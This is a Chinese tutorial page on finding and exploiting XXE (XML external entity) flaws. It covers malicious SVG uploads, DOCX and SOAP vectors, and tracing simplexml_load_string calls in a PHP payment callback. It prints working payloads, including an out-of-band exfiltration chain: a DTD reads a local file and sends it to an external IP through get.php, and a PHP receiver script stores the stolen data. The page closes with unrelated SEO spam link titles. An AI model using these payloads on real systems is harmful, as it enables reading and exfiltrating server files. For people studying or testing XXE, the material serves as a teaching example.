当前位置: 首页 > wzjs >正文

网站空间要多大长沙影楼网站建设

网站空间要多大,长沙影楼网站建设,wordpress医疗模板下载,中企动力合作网站知识点&#xff1a; 1、WEB攻防-XML&XXE-黑盒功能点挖掘 2、WEB攻防-XML&XXE-白盒函数点挖掘 3、WEB攻防-XML&XXE-SRC报告 一、演示案例-WEB攻防-XML&XXE-黑盒功能点挖掘 1、不安全的图像读取-SVG <?xml version"1.0" standalone"yes&qu…

知识点:
1、WEB攻防-XML&XXE-黑盒功能点挖掘
2、WEB攻防-XML&XXE-白盒函数点挖掘
3、WEB攻防-XML&XXE-SRC报告

一、演示案例-WEB攻防-XML&XXE-黑盒功能点挖掘

1、不安全的图像读取-SVG

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://dnslog.cn" > ]>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text>
</svg>

在这里插入图片描述
在这里插入图片描述

2、不安全的文档转换-DOCX

参考地址:https://blog.csdn.net/weixin_57567655/article/details/124588490
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
也可以使用工具直接生成:https://github.com/whitel1st/docem

3、不安全的传递服务-SOAP

在这里插入图片描述
在这里插入图片描述

二、演示案例-WEB攻防-XML&XXE-白盒函数点挖掘

1、漏洞函数simplexml_load_string

在这里插入图片描述

2、pe_getxml函数调用了漏洞函数

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

3、wechat_getxml调用了pe_getxml

在这里插入图片描述
在这里插入图片描述

4、notify_url调用了wechat_getxml

在这里插入图片描述
在这里插入图片描述

5、访问notify_url文件触发wechat_getxml函数,构造Paylod测试。

在这里插入图片描述

先尝试读取文件,无回显后带外测试:
<?xml version="1.0" ?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "http://1uwlwv.dnslog.cn">
%file;
]>
<root>&send;</root>

在这里插入图片描述
在这里插入图片描述

然后带外传递数据解决无回显:
<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "file:///d:/1.txt">
<!ENTITY % remote SYSTEM "http://47.94.236.117/test.dtd">
%remote;
%all;
]>
<root>&send;</root>test.dtd:
<!ENTITY % all "<!ENTITY send SYSTEM 'http://47.94.236.117/get.php?file=%file;'>">get.php:
<?php
$data=$_GET['file'];
$myfile = fopen("file.txt", "w+");
fwrite($myfile, $data);
fclose($myfile);
?>

三、演示案例-WEB攻防-XML&XXE-SRC报告

https://xz.aliyun.com/news/16463
https://mp.weixin.qq.com/s/biQgwMU2v1I92CsDOFRB7g
https://mp.weixin.qq.com/s/1pj9sbwKT6RjIiLgNC7-Gg
https://mp.weixin.qq.com/s/Mgd91_Iie-wZU7MqP5oCXw

http://www.dtcms.com/wzjs/548772.html

相关文章:

  • 烟台网站推广ppt模板免费下载百度云
  • 网站外链应该怎么做网站开发员的工资
  • 厦门网站建设系统网站建设 概念
  • 网站设计报告总结找公司做网站有什么好处
  • 特级a做爰网站网站建设高手要学多久
  • 晚上网站推广软件免费版seo推广教学
  • 北京网站建设公司公司网站建设合同首付多少钱
  • 贵阳设计网站公司注册网上查名
  • asp.net做三个网站wap712c
  • 网站开发经济可行性分析怎么写网站开发工具js
  • 印尼请人做网站wordpress编辑器转义
  • 如何做购物网站推广怎么iis设置网站
  • 黄浦西安网站建设织梦免费网站模块
  • 网站建设视屏教程农业网站设计
  • 网站建设价值wordpress 插件反复安装
  • 做网站论坛wordpress变色龙主题
  • 自助建站软件自动建站系统网站备案要幕布照
  • 单人网站制作php网站开发实例编程
  • 网站建设 协议书钦州市网站建设
  • 浙江省建设培训中心网站大连网站开发价格
  • lol做任务领头像网站网站推广计划包括哪些
  • 重庆做网站团队简单的网页设计主题
  • vs做网站开发吗深圳企业网站建设设计制作方案
  • 上海网站建设网页设池州网站建设开发
  • 网站排名优化首页wordpress 网站地址
  • 江门网站建设公司哪家好wordpress 主题 知乎
  • 电脑上做免费网站教程制作网站小程序
  • 株洲企业网站建设品牌哪些网站才能具备完整的八项网络营销功能
  • 宁波企业建网站报价中国网库做网站
  • 台州自助建站在线咨询wordpress安全设置